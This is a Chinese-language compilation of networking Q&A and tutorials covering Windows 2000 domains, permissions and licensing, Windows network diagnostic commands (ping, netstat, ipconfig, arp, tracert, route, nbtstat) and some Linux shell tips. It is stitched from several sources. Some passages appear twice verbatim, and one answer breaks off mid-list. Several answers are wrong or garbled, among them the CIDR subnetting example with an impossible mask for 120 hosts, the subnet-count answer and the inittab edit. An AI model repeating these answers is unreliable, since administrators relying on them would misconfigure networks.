答：在PROFESSIONAL和SERVER，ADVANCED SERVER中可以用POWER USER创建打印机。提升为DC上就不在有POWER USER。

4、反成员资格“是什么意思？
就是一个组所拥有的成员。

5、我登陆的时候说不允许从我这台计算机登陆。
有登陆限制！！限制了你在哪一台计算机登陆。在DC的帐户属性中，的ACCOUNT选项中的LOGON TO 中可以设定从域中的哪一台计算机登陆。1.怎样安装活动目录?
答：通过开始菜单，选择“运行--输入DCPROMO”

信息来源：RingZ BBS

1、请问能否将域本地组加入其它域的全局组中？
答：可以加入全局组的有通用组,全局组和域本地组.
2、administrators成员能不能用同一个帐号创建share folder和Dfs root?
答：ADMINISTRATOR的权利在W2K中是最大的。除非通过GP进行限制。

3、POWER USER组能创建打印机吗？
答：在PROFESSIONAL和SERVER，ADVANCED SERVER中可以用POWER USER创建打印机。提升为DC上就不在有POWER USER。

4、反成员资格“是什么意思？
就是一个组所拥有的成员。

5、我登陆的时候说不允许从我这台计算机登陆。
有登陆限制！！限制了你在哪一台计算机登陆。在DC的帐户属性中，的ACCOUNT选项中的LOGON TO 中可以设定从域中的哪一台计算机登陆。1.怎样安装活动目录?
答：通过开始菜单，选择“运行--输入DCPROMO”

6.NTFS分区的权限设置以共享处权限为标准?还是以安全性权限为标准?
答：NTFS分区设置目录权限时，从本地访问是以本地安全处设置的权限为标准，如果从网络访问就是两个取小。、

7.NT4.0支持那些文件系统格式?WINDOWS 2000又支持那些文件系统格式?
答:NT4.0支持FAT、NTFS文件系统格式。
WINDOWS 2000支持FAT、FAT32、NTFS文件系统格式。

8.建立条带卷是否要用相同的硬盘?
答：可以使用不同的硬盘建立条带卷。

9.磁盘镜像的优点?
答：1.可以保护系统磁盘分区和引导磁盘分区。
2.镜像具有良好的读性能。

10.建立RAID-5卷最少要多少个硬盘？
答：最少需要3个硬盘。

11.在终端服务客户机要显示"开始"菜单应该用什么快捷键?
答:ALT+HOME

12.建立拨号连接的步骤?
答: 1.安装调制解调器
2.单击"开始",指向"设置",然后单击"网络和拨号连接".
3.在"网络和拨号连接"窗口中,双击"建立新连接".
4.单击"拨号到专用网络" 或者 "拨号到INTERNET",输入电话号码等.
5.单击完成.

13.DFS根有那两种类型?
答:有独立存在的DFS根和基于域的DFS根.

14.文件加密的密钥是存放在什么位置的?
答:文件加密的密钥是放在文件头标的Data Decryption Field和
Data Recovery Field中.

15问：有一部分人的帳號無法登入server 但有時又可以
答：有可能是你设置了时间限制。

16 问：提示信息為帳號密特碼錯誤或嗣服器拒絕登入,但通過尋求電腦的方式又可以使用server的資源?

答：因为服务器的用户名和口令，和当前进入系统的用户名和口令是一样的。

17 问：CAL 是什么意思？

答：购买客户防问许可证。

18 问：怎样理解域目录树共用连续的名字空间能给个例子吗？
答：如au.contoso.msft 与contoso.msft

19 问：那au.contoso.msft 与contoso.msft连续？
答：是连续的。

20问：什么是单一控制与多域控制？
答：就是只有一个域与多个域，

21问：OU怎么理解？
答：OU表示组织单元。

22问：请问如何实现VPN？
答：配置通过INTERNET连接到专用网。


23:对计算机的性能进行检测的时候，“计数器“产生的日志如何察看？最好能把每一种格式对应的察看工具都列出来。

性能日志可以分为CSV,TSV,二进制和二进制循环.CSV可以用电子表格软件查看,如EXCEL,TSV可以用文本编辑工具查看。


24 不能举个插接站(docking station)的实例？

插接站是一种用来拓展笔记本电脑和膝上型电脑的拓展组件。


25 建立"直接连接到另一个计算机"主要用在什么情况？有什么好处？

直接连接到另一个计算机是指两台计算机通过COM端口进行计算机通信的方法，其受COM端口速率限制最大为115200BPS。注意，这时候这种方法不需要使用网卡。


26 "VPN连接"与普通的拔号连接有什么主要区别？只是省钱吗？省在什么地方？

VPN是VISAL PRIVATE NETWORK 的缩写，见附图。蓝色是ＰＳＴＮ拨号到企业ＲＡＳ，而黑色的粗线条表示通过ＶＰＮ连接到企业的网络。这种方式可以提供更高的安全性，如果是人员出差到外地就更可以剩下长途话费。而只需支付上网费和到ＶＰＮ的租用费用。


27 问：“热修复“是什么意思？能不能举个例子？.

答：见过针对某一个问题的补丁吗??这就可以算是一个HOTFIX.


28 怎样更改打印机的Spool?

答：Spool意思为打印机缓冲池，可以加快打印速度，打印机缓冲池中的打印设备可以不一样，但是必须使用相同的打印机驱动程序。打印机缓冲池由一个打印机组成，通过打印服务器的多个打印端口连接到多个打印设备。

创建打印机缓冲池：打开打印机的”属性”对话框，在”端口”选项卡下，选择”启用打印机缓冲池”。

更改打印机缓冲池：打开打印机的”属性”对话框，在”高级”选项卡下，在”Spool文件夹中”，键入相应的缓冲池文件夹的目录所在位置。


29 问：224.224.224.224属于D类地址，其子网掩码为多少？

答：224.224.224.224属于D类地址，D类地址保留作为多播使用，其没有ABC类所固有的子网掩码。但在局域网中可以根据你自己的设置而定，所谓的ABCDE类只是传统的分类，将逐步被IPV6、CIDR和VLSM所淘汰。


30 问：测试TCP/IP配置最常用工具是Ipconfig、Ping和Nslookup中的哪两个？

答：三个工具都常用，但最常用应该是Ipconfig和Ping。Ipconfig具体测试TCP/IP的配置（如IP地址、默认网关地址、DNS、WINS地址、子网掩码、MAC地址），而Ping则主要测试网络连通性。


31 问：IP地址可分为ABCDE五类，如192.168.1.10本属于C类地址，但有了子网掩码后，IP地址的分类就无效了，例如，子网掩码为255.255.0.0,那么上述地址就变成了B类地址,是这样吗?

答：它们分类依然是存在的，只是其具体的掩码变了，这样做的目的是为了解决以住IP地址分类的局限性所带来的缺陷，这样可以节约IP地址空间，使IP地址的分配和管理更加灵活。


32 问：帧中继的传输速度是多少？

答：帧中继的传输速度可以达到155-622M，可以达到其线路所能提供的带宽的速度。


33 问：在运行Win 98的机器中使用TCP/IP实用程序（如ARP，Ping），应该在什么地方输入？

答：打开”开始”菜单，进入”程序”的”附件”中的”命令提示符”。


34 问: RPC是什么?

答: rpc是远程进程调用


35 问: 用户名中后缀的作用是什么?

答: 区别一个用户可以访问的资源的作用域!


36 问: 如果一个C类网络用掩码255.255.255.192划分子网，那么会产生多少个可用的子网？

答: 先将192化为二进制是:11000000,用他和C类网进行与操作,所以可以的网络号 为:XXX.XXX.XXX.10111111;XXX.XXX.XXX.11111111;XXX.XXX.XXX.01111111;XXX.XXX.XXX.00111111;有四个网络ID.


37 问: 在同一个域中的计算机都必须中同一个IP子网中吗？

答: 不必!!可以是不同的子网的!

38 问：我想让你给我解释一下子网是如何划分的。把单个的CIDR网络ID划分成较小的网络ID就不会增加路由器中路由表的数量了吗？请你给我举例说明一下，可以吗？希望你能把具体的IP地址，网络ID，子网掩码列出来。

答：是的把单个的CIDR网络划分成较小的网络会增加路由表中的信息，CIDR是为了优化节约IP地址的分配并结合具体实际而产生的，由于IPV4 IP地址的分类的局限性使一个大于255台主机的网络都必须用一个B类地址，故造成了IP地址的巨大浪费，另一种情况就是用很多个C类地址去补，那么则造成了路由表的快速增长，但只有RIP2和OSPF路由协议支持CIDR。下面是一个具体的例子：

如果一个公司有1500台主机，公司有一个网络ID165.223.0.0的B类网址，公司有三个部门其中总部（A）有180台PC，IT资源部（B）有1200台PC，人力资源部（C）有120台PC,你怎样优化公司的网络地址的分配。则这个题的答案为：

A:网络ID可为165.223.1.0掩码为255.255.255.0主机IP地址范围为165.223.1.1---165.223.1.254

B:网络ID可为165.223.2.0掩码为255.255.248.0主机IP地址范围为165.223.2.1---165.223.7.254

C:网络ID可为165.223.8.0掩码为255.255.255.254主机IP地址范围为165.223.8.1---165.223.8.127

如果用B类地址将造成64036个IP地址的浪费，用C类地址需要6个C类网络，则需要在路由表中增加6条记录，而用CIDR只需要三条记录，并且其它的IP地址可分配给其它的公司。


39 问：我在WIN2000 ADVANCED SERVER 中安装内置得全拼输入法后，无法输入汉字，只能显示成小方框，OS好像又不支持其它的拼音输入法！

答：这个问题应该是在WORD中不能输入汉字，这可能是由于2000的BUG所引起的，但可以在其它字处理软件(如FRONTPG)中输入汉字，这样你可以在其它文档中(如FRONTPG)输入后，再复制过来排版就没有问题了。我也是这样处理的，目前确实只有这个办法。


40 问：我的机器在不同的分区安装了winme和win2k，我想让两个操作系统的OE（outlook express）邮件共享同一文件夹,请问怎样操作。

答：具体做法如下：打开OE--工具--选项--维护--存储文件夹--更改--输入新文件夹的位置即可。


41 问：域和工作组的区别

答：域和工作组都是一组计算机的逻辑组合。工作组俗称对等网络，其中没有专用的服务器。工作组中的用户帐号和计算机帐号存储在本地计算机的安全数据库中。资源的使用、管理和身份鉴定都在计算机本地进行。通常情况下工作组中的计算机数目不超过10个，且对数据安全要求不高和网络增长不大。域中计算机共享一个公共的安全数据库，用于存储安全信息。域中资源的使用、管理和身份验证都是在域控制器上集中进行。域中所有的用户帐户都存储在域控制器上。域的规模是可伸缩的。


42 问：Single Master domain、Multiple Master domain、Complete Trust domain的区别？

答：单主控域是只单域结构且只有一个域控制器，多主控域指单域结构多个域控制器；完全信任域是指有明确信任关系的域。在1561B中讲得较为详细。


43 问：请详细说明 “森林中的树共享一个公用的配置”这句话的意思。

答：森林共享一个公用的配置即指森林中的树共享一个通用的目录架构、配置信息和全局目录。

44 问：创建子OU需要哪些权限？

答：需要Read、List Contents、Create All Child Objects的权限。具有读的权限你才能够访问OU，列表的权限可以让你看见自己创建的子OU，创建所有子对象的权限能够创建子OU。


45 问:AGGDLP是什么意思?

答:AGGDLP是一种授权方式:具体如下:account->globle group->domain local group<-permission.这样可以比较容易的控制权限.


46 问: 在同一个域中的计算机都必须中同一个IP子网中吗？

答: 不必.可以在几个IP子网.


47问: “管理WEB站点”是不是用来管理“默认WEB站点”的？

答: 管理WEB站点是用来管理WEB服务器的实际上,管理WEB站点是一套ASP程序和VB脚本.其作用是远程管理WEB服务器,具体的你可以配置后使用就知道了,其实他的设置和在搞一个站点的设置方法是一样的!说的再通俗一点,是MS搞的基于ASP的网站管理脚本!


48 问: 已知对方的IP地址，怎样才能得到它的NetBIOS名称

答: 你可以先运行CMD.exe,然后在提示符号下输入:nbtstat -a ip 你就可以看到NETBIOS信息.


49 问:WINS复制那些内容?

答：WINS复制时复制WINS数据库中被标为活动的和墓碑的WINS记录。


50 问:WINS复制的时间间隔为多久？

答：WINS复制时间间隔系统默认为两个小时，WINS数据库备份时间间隔系统默认为三个小时，注意这两个概念的区别。


51问: Win2000中的Clustering，有的书称为“集群”，而有的书却称“群集”，哪一个正确？

答：都正确，但是“集群”，更为普遍一些。


52问: 我用的是ADSL，但是下载速度为50—60KB，请为是否正常？

答：ADSL的上传速度可达640KB,最高下载速度可达9MB。由于国内目前只开通了512的ADSL带宽，还存在带宽的分割，故只有50-60KB。


53问： 安装高级服务器时，有关“Per Server”和“Per Seat”许可证模式是安装时定,还是购买时定？

答：安装时定。对于每一个访问WIN2000服务器的客户机都必须要求具有一个CAL，WIN2000有两种许可证模式：Per Seat（每客户）和Per Server（每服务器）。

Per Seat:指对访问服务器的每客户机都必须有一个CAL，则客户机可以连接到任何数目的服务器。通常这种模式应用在一个网络具有多个服务器的情况下。

Per Server:指到服务器每一个并发（同时）连接，都需要有一个CAL，表示每一时刻服务器最大的并发连接数。通常这种模式应用在单个服务器且客户机数目相对固定的情况下。

注意：许可证模式可从每服务器转换为每客户机，不能从每客户机转换为每服务器模式。


54 问：使用RIS远程安装客户机，需要哪些条件？

答：网络服务器上必须启用了DNS服务、DHCP服务和活动目录服务，客户机方面必须满足NET PC规范、带PXE的网络适配器，或一个网络适配器和远程安装启动盘

　信息来源：天极网　

我想大家不会忘记Windows是从简单的DOS字符界面发展过来的。虽然我们平时在使用Windows操作系统的时候，主要是对图形界面进行操作，但是DOS命令我们仍然非常有用，下面就让我看来看看这些命令到底有那些作用，同时学习如何使用这些命令的技巧。

　　一、Ping命令的使用技巧

　　Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据包。根据返回的信息，我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的，我们必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。

　信息来源：天极网　

我想大家不会忘记Windows是从简单的DOS字符界面发展过来的。虽然我们平时在使用Windows操作系统的时候，主要是对图形界面进行操作，但是DOS命令我们仍然非常有用，下面就让我看来看看这些命令到底有那些作用，同时学习如何使用这些命令的技巧。

　　一、Ping命令的使用技巧

　　Ping是个使用频率极高的实用程序，用于确定本地主机是否能与另一台主机交换（发送与接收）数据包。根据返回的信息，我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是：成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的，我们必须执行大量的本地主机与远程主机的数据报交换，才能确信TCP/IP的正确性。

　　简单的说，Ping就是一个测试程序，如果Ping运行正确，我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障，从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送，Ping也被某些别有用心的人作为DDOS（拒绝服务攻击）的工具，例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。

　　按照缺省设置，Windows上运行的Ping命令发送4个ICMP（网间控制报文协议）回送请求，每个32字节数据，如果一切正常，我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短，表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL（Time To Live存在时间）值，我们可以通过TTL值推算一下数据包已经通过了多少个路由器：源地点TTL起始值（就是比返回TTL略大的一个2的乘方数）-返回时TTL值。例如，返回TTL值为119，那么可以推算数据报离开源地址的TTL起始值为128，而源地点到目标地点要通过9个路由器网段（128-119）；如果返回TTL值为246，TTL起始值就是256，源地点到目标地点要通过9个路由器网段。

　　1、通过Ping检测网络故障的典型次序

　　正常情况下，当我们使用Ping命令来查找问题所在或检验网络运行情况时，我们需要使用许多Ping命令，如果所有都运行正确，我们就可以相信基本的连通性和配置参数没有问题；如果某些Ping命令出现运行故障，它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障：

　　·ping 127.0.0.1
　　这个Ping命令被送到本地计算机的IP软件，该命令永不退出该计算机。如果没有做到这一点，就表示TCP/IP的安装或运行存在某些最基本的问题。

　　·ping 本机IP
　　这个命令被送到我们计算机所配置的IP地址，我们的计算机始终都应该对该Ping命令作出应答，如果没有，则表示本地配置或安装存在问题。出现此问题时，局域网用户请断开网络电缆，然后重新发送该命令。如果网线断开后本命令正确，则表示另一台计算机可能配置了相同的IP地址。

　　·ping 局域网内其他IP
　　这个命令应该离开我们的计算机，经过网卡及网络电缆到达其他计算机，再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答，那么表示子网掩码（进行子网分割时，将IP地址的网络部分与主机部分分开的代码）不正确或网卡配置错误或电缆系统有问题。

　　·ping 网关IP
　　这个命令如果应答正确，表示局域网中的网关路由器正在运行并能够作出应答。

　　·ping 远程IP
　　如果收到4个应答，表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet（但不排除ISP的DNS会有问题）。

　　·ping localhost
　　localhost是个作系统的网络保留名，它是127.0.0.1的别名，每台计算机都应该能够将该名字转换成该地址。如果没有做到这一带内，则表示主机文件（/Windows/host）中存在问题。

　　·ping www.xxx.com（如www.yesky.com 天极网）
　　对这个域名执行Ping www.xxx.com 地址，通常是通过DNS 服务器 如果这里出现故障，则表示DNS服务器的IP地址配置不正确或DNS服务器有故障（对于拨号上网用户，某些ISP已经不需要设置DNS服务器了）。顺便说一句：我们也可以利用该命令实现域名对IP地址的转换功能。

　　如果上面所列出的所有Ping命令都能正常运行，那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是，这些命令的成功并不表示我们所有的网络配置都没有问题，例如，某些子网掩码错误就可能无法用这些方法检测到。

　　2、Ping命令的常用参数选项

　　·ping IP –t
　　连续对IP地址执行Ping命令，直到被用户以Ctrl+C中断。

　　·ping IP -l 3000
　　指定Ping命令中的数据长度为3000字节，而不是缺省的32字节。

　　·ping IP –n
　　执行特定次数的Ping命令。

　　二、Netstat 命令的使用技巧

　　Netstat用于显示与IP、TCP、UDP和ICMP协议相关的统计数据，一般用于检验本机各端口的网络连接情况。

　　如果我们的计算机有时候接受到的数据报会导致出错数据删除或故障，我们不必感到奇怪，TCP/IP可以容许这些类型的错误，并能够自动重发数据报。但如果累计的出错情况数目占到所接收的IP数据报相当大的百分比，或者它的数目正迅速增加，那么我们就应该使用Netstat查一查为什么会出现这些情况了。

　　1、netstat 的一些常用选项

　　·netstat –s

　　本选项能够按照各个协议分别显示其统计数据。如果我们的应用程序（如Web浏览器）运行速度比较慢，或者不能显示Web页之类的数据，那么我们就可以用本选项来查看一下所显示的信息。我们需要仔细查看统计数据的各行，找到出错的关键字，进而确定问题所在。

　　·netstat –e

　　本选项用于显示关于以太网的统计数据。它列出的项目包括传送的数据报的总字节数、错误数、删除数、数据报的数量和广播的数量。这些统计数据既有发送的数据报数量，也有接收的数据报数量。这个选项可以用来统计一些基本的网络流量）。

　　·netstat –r

　　本选项可以显示关于路由表的信息，类似于后面所讲使用route print命令时看到的 信息。除了显示有效路由外，还显示当前有效的连接。

　　·netstat –a

　　本选项显示一个所有的有效连接信息列表，包括已建立的连接（ESTABLISHED），也包括监听连接请求（LISTENING）的那些连接。

　　·netstat –n

　　显示所有已建立的有效连接。

　　下面是 netstat 的输出示例：

　　C:>netstat -e

　　Interface Statistics

　　ReceivedSent

　　Bytes399583794047224622

　　Unicast packets120099131015

　　Non-unicast packets7579544 3823

　　Discards 0 0

　　Errors 0 0

　　Unknown protocols363054211

　　C:>netstat -a

　　Active Connections

　　Proto Local AddressForeign Address State

　　TCPCORP1:1572 172.16.48.10:nbsession ESTABLISHED

　　TCPCORP1:1589 172.16.48.10:nbsession ESTABLISHED

　　TCPCORP1:1606 172.16.105.245:nbsession ESTABLISHED

　　TCPCORP1:1632 172.16.48.213:nbsessionESTABLISHED

　　TCPCORP1:1659 172.16.48.169:nbsessionESTABLISHED

　　TCPCORP1:1714 172.16.48.203:nbsessionESTABLISHED

　　TCPCORP1:1719 172.16.48.36:nbsession ESTABLISHED

　　TCPCORP1:1241 172.16.48.101:nbsessionESTABLISHED

　　UDPCORP1:1025 *:*

　　UDPCORP1:snmp *:*

　　UDPCORP1:nbname *:*

　　UDPCORP1:nbdatagram *:*

　　UDPCORP1:nbname *:*

　　UDPCORP1:nbdatagram *:*

　　C:>netstat -s

　　IP Statistics

　　Packets Received = 5378528

　　Received Header Errors = 738854

　　Received Address Errors= 23150

　　Datagrams Forwarded= 0

　　Unknown Protocols Received = 0

　　Received Packets Discarded = 0

　　Received Packets Delivered = 4616524

　　Output Requests= 132702

　　Routing Discards = 157

　　Discarded Output Packets = 0

　　Output Packet No Route = 0

　　Reassembly Required= 0

　　Reassembly Successful = 0

　　Reassembly Failures =

　　Datagrams Successfully Fragmented = 0

　　Datagrams Failing Fragmentation = 0

　　Fragments Created = 0

　　ICMP Statistics

　　ReceivedSent

　　Messages 693 4

　　Errors 0 0

　　Destination Unreachable685 0

　　Time Exceeded0 0

　　Parameter Problems 0 0

　　Source Quenches0 0

　　Redirects0 0

　　Echoes 4 0

　　Echo Replies 0 4

　　Timestamps 0 0

　　Timestamp Replies0 0

　　Address Masks0 0

　　Address Mask Replies 0 0

　　TCP Statistics

　　Active Opens = 597

　　Passive Opens= 135

　　Failed Connection Attempts = 107

　　Reset Connections= 91

　　Current Connections= 8

　　Segments Received= 106770

　　Segments Sent= 118431

　　Segments Retransmitted = 461

　　UDP Statistics

　　Datagrams Received = 4157136

　　No Ports = 351928

　　ReceiveErrors = 2

　　Datagrams Sent = 13809

　　2、Netstat的妙用

　　经常上网的人一般都使用ICQ的，不知道我们有没有被一些讨厌的人骚扰，想投诉却又不知从和下手？其实，我们只要知道对方的IP，就可以向他所属的ISP投诉了。但怎样才能通过ICQ知道对方的IP呢？如果对方在设置ICQ时选择了不显示IP地址，那我们是无法在信息栏中看到的。其实，我们只需要通过Netstat就可以很方便的做到这一点：当他通过ICQ或其他的工具与我们相连时（例如我们给他发一条ICQ信息或他给我们发一条信息），我们立刻在DOS 命令提示符下输入netstat -n或netstat -a就可以看到对方上网时所用的IP或ISP域名了，甚至连所用Port都完全暴露了。

　三、IPConfig命令的使用技巧

　　IPConfig实用程序和它的等价图形用户界面----Windows 95/98中的WinIPCfg可用于显示当前的TCP/IP配置的设置值。这些信息一般用来检验人工配置的TCP/IP设置是否正确。但是，如果我们的计算机和所在的局域网使用了动态主机配置协议（DHCP），这个程序所显示的信息也许更加实用。这时，IPConfig可以让我们了解自己的计算机是否成功的租用到一个IP地址，如果租用到则可以了解它目前分配到的是什么地址。了解计算机当前的IP地址、子网掩码和缺省网关实际上是进行测试和故障分析的必要项目。

　　1、IPConfig最常用的选项

　　·ipconfig

　　当使用IPConfig时不带任何参数选项，那么它为每个已经配置了的接口显示IP地址、子网掩码和缺省网关值。

　　·ipconfig /all

　　当使用all选项时，IPConfig能为DNS和WINS服务器显示它已配置且所要使用的附加信息（如IP地址等），并且显示内置于本地网卡中的物理地址（MAC）。如果IP地址是从DHCP服务器租用的，IPConfig将显示DHCP服务器的IP地址和租用地址预计失效的日期。

　　·ipconfig /release和ipconfig /renew

　　这是两个附加选项，只能在向DHCP服务器租用其IP地址的计算机上起作用。如果我们输入ipconfig /release，那么所有接口的租用IP地址便重新交付给DHCP服务器（归还IP地址）。如果我们输入ipconfig /renew，那么本地计算机便设法与DHCP服务器取得联系，并租用一个IP地址。请注意，大多数情况下网卡将被重新赋予和以前所赋予的相同的IP地址。

　　下面的范例是 ipconfig /all 命令输出，该计算机配置成使用 DHCP 服务器动态配置 TCP/IP，并使用 WINS 和 DNS 服务器解析名称。

　　Windows 2000 IP Configuration

　　Node Type.. . . . . . . . : Hybrid

　　IP Routing Enabled.. . . . : No

　　WINS Proxy Enabled.. . . . : No

　　Ethernet adapter Local Area Connection:

　　Host Name.. . . . . . . . : corp1.microsoft.com

　　DNS Servers . . . . . . . : 10.1.0.200

　　Description. . . . . . . : 3Com 3C90x Ethernet Adapter

　　Physical Address. . . . . : 00-60-08-3E-46-07

　　DHCP Enabled.. . . . . . . : Yes

　　Autoconfiguration Enabled.: Yes

　　IP Address. . . . . . . . . : 192.168.0.112

　　Subnet Mask. . . . . . . . : 255.255.0.0

　　Default Gateway. . . . . . : 192.168.0.1

　　DHCP Server. . . . . . . . : 10.1.0.50

　　Primary WINS Server. . . . : 10.1.0.101

　　Secondary WINS Server. . . : 10.1.0.102

　　Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM

　　Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM

　　如果我们使用的是Windows 95/98，那么我们应该更习惯使用winipcfg而不是ipconfig，因为它是一个图形用户界面，而且所显示的信息与ipconfig相同，并且也提供发布和更新动态IP地址的选项。

　　四、ARP（地址转换协议）的使用技巧

　　ARP是一个重要的TCP/IP协议，并且用于确定对应IP地址的网卡物理地址。实用arp命令，我们能够查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外，使用arp命令，也可以用人工方式输入静态的网卡物理/IP地址对，我们可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项作，有助于减少网络上的信息量。

　　按照缺省设置，ARP高速缓存中的项目是动态的，每当发送一个指定地点的数据报且高速缓存中不存在当前项目时，ARP便会自动添加该项目。一旦高速缓存的项目被输入，它们就已经开始走向失效状态。例如，在Windows NT/2000网络中，如果输入项目后不进一步使用，物理/IP地址对就会在2至10分钟内失效。因此，如果ARP高速缓存中项目很少或根本没有时，请不要奇怪，通过另一台计算机或路由器的ping命令即可添加。所以，需要通过arp命令查看高速缓存中的内容时，请最好先ping 此台计算机（不能是本机发送ping命令）。

　　ARP常用命令选项：

　　·arp -a或arp –g

　　用于查看高速缓存中的所有项目。-a和-g参数的结果是一样的，多年来-g一直是UNIX平台上用来显示ARP高速缓存中所有项目的选项，而Windows用的是arp -a（-a可被视为all，即全部的意思），但它也可以接受比较传统的-g选项。

　　·arp -a IP

　　如果我们有多个网卡，那么使用arp -a加上接口的IP地址，就可以只显示与该接口相关的ARP缓存项目。

　　·arp -s IP 物理地址

　　我们可以向ARP高速缓存中人工输入一个静态项目。该项目在计算机引导过程中将保持有效状态，或者在出现错误时，人工配置的物理地址将自动更新该项目。

　　·arp -d IP

　　使用本命令能够人工删除一个静态项目。

　　例如我们在命令提示符下，键入 Arp –a；如果我们使用过 Ping 命令测试并验证从这台计算机到 IP 地址为 10.0.0.99 的主机的连通性，则 ARP 缓存显示以下项：

　　Interface:10.0.0.1 on interface 0x1

　　Internet AddressPhysical AddressType

　　10.0.0.99 00-e0-98-00-7c-dc dynamic


　　在此例中，缓存项指出位于 10.0.0.99 的远程主机解析成 00-e0-98-00-7c-dc 的媒体访问控制地址，它是在远程计算机的网卡硬件中分配的。媒体访问控制地址是计算机用于与网络上远程 TCP/IP 主机物理通讯的地址。

　　至此我们可以用ipconfig和ping命令来查看自己的网络配置并判断是否正确、可以用netstat查看别人与我们所建立的连接并找出ICQ使用者所隐藏的IP信息、可以用arp查看网卡的MAC地址。

　　五、Tracert、Route 与 NBTStat的使用技巧

　　1、Tracert的使用技巧

　　如果有网络连通性问题，可以使用 tracert 命令来检查到达的目标 IP 地址的路径并记录结果。tracert 命令显示用于将数据包从计算机传递到目标位置的一组 IP 路由器，以及每个跃点所需的时间。如果数据包不能传递到目标，tracert 命令将显示成功转发数据包的最后一个路由器。当数据报从我们的计算机经过多个网关传送到目的地时，Tracert命令可以用来跟踪数据报使用的路由（路径）。该实用程序跟踪的路径是源计算机到目的地的一条路径，不能保证或认为数据报总遵循这个路径。如果我们的配置使用DNS，那么我们常常会从所产生的应答中得到城市、地址和常见通信公司的名字。Tracert是一个运行得比较慢的命令（如果我们指定的目标地址比较远），每个路由器我们大约需要给它15秒钟。

　　Tracert的使用很简单，只需要在tracert后面跟一个IP地址或URL，Tracert会进行相应的域名转换的。

　　tracert 最常见的用法：

　　tracert IP address [-d] 该命令返回到达 IP 地址所经过的路由器列表。通过使用 -d 选项，将更快地显示路由器路径，因为 tracert 不会尝试解析路径中路由器的名称。

　　Tracert一般用来检测故障的位置，我们可以用tracert IP在哪个环节上出了问题，虽然还是没有确定是什么问题，但它已经告诉了我们问题所在的地方，我们也就可以很有把握的告诉别人----某某地方出了问题。

　　2、Route 的使用技巧

　　大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器，因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题，该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。

　　但是，当网络上拥有两个或多个路由器时，我们就不一定想只依赖缺省网关了。实际上我们可能想让我们的某些远程IP地址通过某个特定的路由器来传递，而其他的远程IP则通过另一个路由器来传递。

　　在这种情况下，我们需要相应的路由信息，这些信息储存在路由表中，每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下，必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。

　　一般使用选项：

　　·route print

　　本命令用于显示路由表中的当前项目，在单路由器网段上的输出；由于用IP地址配置了网卡，因此所有的这些项目都是自动添加的。

　　·route add

　　使用本命令，可以将信路由项目添加给路由表。例如，如果要设定一个到目的网络209.98.32.33的路由，其间要经过5个路由器网段，首先要经过本地网络上的一个路由器，器IP为202.96.123.5，子网掩码为255.255.255.224，那么我们应该输入以下命令：

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5

　　·route change

　　我们可以使用本命令来修改数据的传输路由，不过，我们不能使用本命令来改变数据的目的地。下面这个例子可以将数据的路由改到另一个路由器，它采用一条包含3个网段的更直的路径：

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3

　　·route delete

　　使用本命令可以从路由表中删除路由。例如：route delete 209.98.32.33

　　3、NBTStat的使用技巧

　　使用 nbtstat 命令释放和刷新 NetBIOS 名称。NBTStat（TCP/IP上的NetBIOS统计数据）实用程序用于提供关于关于NetBIOS的统计数据。运用NetBIOS，我们可以查看本地计算机或远程计算机上的NetBIOS名字表格。

　　常用选项：

　　·nbtstat –n

　　显示寄存在本地的名字和服务程序。

　　·nbtstat –c

　　本命令用于显示NetBIOS名字高速缓存的内容。NetBIOS名字高速缓存用于寸放与本计算机最近进行通信的其他计算机的NetBIOS名字和IP地址对。

　　·nbtstat –r

　　本命令用于清除和重新加载NetBIOS名字高速缓存。

　　·nbtstat -a IP

　　通过IP显示另一台计算机的物理地址和名字列表，我们所显示的内容就像对方计算机自己运行nbtstat -n一样。

　　·nbtstat -s IP

　　显示实用其IP地址的另一台计算机的NetBIOS连接表。

　　例如我们在命令提示符下，键入：nbtstat –RR 释放和刷新过程的进度以命令行输出的形式显示。该信息表明当前注册在该计算机的 WINS 中的所有本地 NetBIOS 名称是否已经使用 WINS 服务器释放和续订了注册。

文章出处：视窗中国

1、快速进入某些目录

　　　　　　　键入 cd 或cd ~ 可进入用户的home目录

　　　　　　　键入 cd - 可进入上一个进入的目录

　　　　　　　键入 cd / 可进入根目录

2、ls 命令的文件颜色显示

　　在 /etc/profile文件内加入以下以行即可!

　　alias ls="ls --color"

　　下次启动bash时就可以像在Slackware里那样显示彩色的目录列表了, 其中颜色的含义如下：

　　　　蓝色-->目录

　　　　绿色-->可执行文件

　　　　红色-->压缩文件

　　　　浅蓝色-->链接文件

　　　 灰色-->其他文件

3、删除无用的core文件

　 程序运行出后有时候会产生一个名为core的文件, 这个文件一般很大而且没什么用, 可以删除掉以释放空间

4、启动后直接进入X

　　编辑/etc/inittab文件, 把id:3:initdefautl改为 id:4:initdefautl.

